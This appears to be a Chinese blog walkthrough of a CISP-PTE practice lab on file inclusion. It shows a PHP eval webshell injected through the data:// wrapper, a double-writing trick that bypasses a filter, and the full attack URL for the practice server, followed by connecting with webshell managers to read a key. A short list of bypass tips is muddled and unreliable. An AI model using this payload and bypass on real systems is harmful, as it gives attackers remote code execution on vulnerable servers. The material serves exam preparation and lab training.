CISP-PTE 文件包含

最新推荐文章于 2024-12-23 14:48:03 发布
最新推荐文章于 2024-12-23 14:48:03 发布
阅读量806 收藏 4
点赞数 4
分类专栏: web安全 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XiaoYeZhu_1314/article/details/138188832
版权

题:http://121.41.79.208:83/start/index.php?page=hello

Data URI scheme(data: base64)协议常用数据格式
data:<文本数据>
data:text/plain,<文本数据>
data:text/html,<HTML代码>
data:text/html;base64,<base64编码的HTML代码>
data:text/css,<CSS代码>
data:text/css;base64,<base64编码的CSS代码>
data:text/javascript,<]avascript代码>
data:text/javascript;base64,<base64编码的]avascript代码>
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的icon图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据

1、尝试使用data协议,发现php被过滤掉了

data://text/plain,<?php @eval($_POST['cmd']);?>


2、查看页面源代码,发现data://替换成了空,其余的都在,data://被注释了


3、双写datdata://a://

data协议是一种用于在URL中传递数据的协议,它可以将数据以base64编码的形式嵌入到URL中。然而,由于安全性的考虑,许多浏览器和服务器会对data协议进行过滤,防止恶意代码的执行。
要绕过data协议的过滤,可以尝试以下方法:
1.使用其他协议:可以考虑使用其他协议来传递数据,如http或https协议。这些协议通常不会被过滤。
2.使用URL编码:将数据进行URL编码,然后再传递。URL编码可以将特殊字符转换为%xx的形式,使其不被解析为恶意代码。
3.使用其他编码方式:除了base64编码外,还可以尝试其他编码方式,如hex编码或者自定义的编码方式。这样可以绕过对base64编码的过滤。
http://121.41.79.208:83/start/index.php?page=datdata://a://text/plain,
<?php
@eval($_POST['cmd']);
?>


4、将地址放入蚁剑或菜刀中连接


5、进入文件管理,找到html目录,找到key,拿到值

CISP-PTE考前练习-文件包含
千寻的博客
10-23 4972
文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。
pte 文件包含
weixin_51387754的博客
10-13 1202
注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。
渗透测试CISP-PTE文件包含
未知2066的博客
03-01 1689
文件包含漏洞(File Inclusion Vulnerability)是一种常见的Web应用程序安全漏洞。它会导致攻击者可以通过控制文件包含的输入来执行任意的代码。文件包含漏洞通常出现在Web应用程序中,当应用程序在处理用户输入时,没有正确地检查和验证用户提供的文件路径或文件名。攻击者可以利用这个漏洞,将恶意文件包含到应用程序的执行流程中,从而执行恶意代码。
PTE靶场03----文件包含
最新发布
weixin_45935703的博客
12-23 486
简单来说就是一个文件里面包含另外一个或多个文件。测试url地址栏能否用上文件包含能够访问最基本的linux目录下的passwd。
CISP-PTE练习篇(基础题目三:文件包含
wojiaoqwe的博客
01-30 3845
本文仅当作练习记录使用。
PTE文件包含--dvwa,pikachu
leo788的博客
12-18 309
构造位置:http://127.0.0.1:8082/vulnerabilities/fi/?拼接一下:file:///C:\phpstudy_pro\WWW\dvwa\hackable\uploads\picshell.jpg。包含位置:http://127.0.0.1:8082/vulnerabilities/fi/?图片位置:http://127.0.0.1:8082/hackable/uploads/picshell.jpg。
考试类精品--CISP-PTE 考试环境源码.zip
02-06
这个压缩包可能包含了用于模拟CISP-PTE考试环境的源代码,对于考生而言,这是一份宝贵的复习和实践材料。 【描述】"考试类精品--CISP-PTE 考试环境源码"表明该压缩包中的源代码是高质量的,可能经过精心设计和测试...
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场搭建方法.rar文件提供了详细的步骤指导,帮助用户在本地或虚拟环境中配置和运行这些靶场。通常,这会涉及安装虚拟机软件(如VirtualBox或VMware),导入靶场镜像,配置网络设置,以及可能的系统初始化...
精心整理-渗透测试工程师(CISP-PTE)考试资料大全(包括课件PPT,考试大纲,题库及经验分享).zip
04-07
精心整理,渗透测试工程师(CISP-PTE)考试资料大全,包括课件PPT,考试大纲,题库及经验分享,共75份。 一、CISP-PTE课件 WEB安全 操作系统安全 数据库安全 中间件安全 CISP-PTE模拟考试练习 渗透测试基础.pdf ...
CISP-PTE 基础讲解
beirry的博客
12-09 1335
此篇文章是写给对于对安全行业的术语没有一个了解的初学者。
CISP-PTE.rar
10-28
2019年CISP-PTE考点,CISP攻防领域培训授权机构名录(2019),注册信息安全专业人员-渗透测试工程师考试及注册申请表(2018).doc
PTE笔记:文件上传与文件包含
小月肖的博客
06-13 999
PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。2)黑名单过滤,不允许上传php、xx等,这时候,上传一个图片码,用bp抓包,在repeater中修改后缀为php3、php4、php5、phtml等;1)白名单过滤,只允许上传xx,这时候就做一个图片码,将图片码上传上去,用bp抓包,在repeater中修改后缀,然后发送,再去浏览器查看。针对../过滤-->双写..././-->..\。
网络安全学习笔记——文件包含漏洞(PTE-WEB
just do it
06-10 453
php允许文件间的互相引用,可以在php文件里面使用include,一般来说,引用的东西应该在同一个目录里面,所以可以使用相对路径来引用——include "2.php"开发人员为了提升效率,采用文件包含的函数,由于php语言提供的文件包含功能过于强大,所以大部分的文件包含漏洞都出现在php程序之中本地文件包含是指被包含的文件在本地,可以直接通过文件名或文件夹名+文件名来引用包含,远程文件则需使用如 include"https://baidu.com/nosery"
PTE_本地文件包含wp
CHUNJIUJUN的博客
08-13 748
进入题目,提示答案在根目录下的key.php文件中,所以我们最后只需要cat该文件应该就有key了 开始答题,页面上没有什么有用信息 查看该页面的源码,也没找到什么有用信息 我们发现网页是使用文件包含的方法打开了view.html,我们可以访问view.html,然后查看源码 发现用Hello传了一次参数,第四行进行了base64加密 进行base64解密,发现是用POST方式以z0传参 综上,我们一共需要传两次参数,第一次是Hello需要传参,这里随便给He
PTE_远程文件包含wp
CHUNJIUJUN的博客
08-13 618
一堆看不懂的东西,发现并没有本地文件包含的点 试试远程文件包含,发现是可以的 从远程服务器远程文件包含一个写了一句话木马的 1.txt 发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀 成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦 显示 get it 查看源码,发现key值 ...
渗透之路基础 -- 文件包含
09-16 531
本地包含漏洞 PHP常见函数 include() <?php $file=$_GET['f']; include($file); ?> 文件包含漏洞原理:利用include的函数执行网站服务器的文件 想要访问test外的 phpinfo.php文件可以这样访问 漏洞产生: 可控变量 $file 使用函数 include 其他函数 include_once,requ...
pte练习——34051(sql)、34061、34214(代码)、34223(文件包含)、34224(xss)、34234(代码)、34415(xss)
haoaaao的博客
02-10 3062
一、34051(sql注入) 1、输入用户名和特殊字符密码,发现个别字符被屏蔽,说明用户密码中存在sql注入漏洞。 2、想办法闭合语句,发现关键词大多数被屏蔽,尝试用or闭合,or被屏蔽,使用多写或大写可以绕过: 二、34061(sql注入) 1、题中给出查询语句,想办法闭合语句: 2、使用sql语句查询: (1)order by测试列数为7: (2)union select联...
CISP-PTE讲义.zip
11-08
CISP-PTE认证教程讲义 001-linux操作系统安全V2.0 002-windows操作系统安全V2.0 003-数据库安全 004-Web安全基础0 005-Web安全基础1 - HTTP协议 006-Web安全基础2 - 注入漏洞 007-Web安全基础3 - XSS漏洞 008-Web安全基础4 - 请求伪造漏洞 009-Web安全基础5 - 文件处理漏洞 010-Web安全基础6 - 访问控制漏洞 011-Web安全基础7 - 会话管理漏洞 012-Web安全基础8 - 实战练习 013-Apache-finished 014-IIS 015-jboss 016-tomcat 017-weblogic(2) 018-web应用服务器安全加固
模拟cisp-pte 第三题 文件包含
小明师傅博客
06-14 4881
input的方式写入一句话 菜刀连他拿到key
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小野猪都有白菜拱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值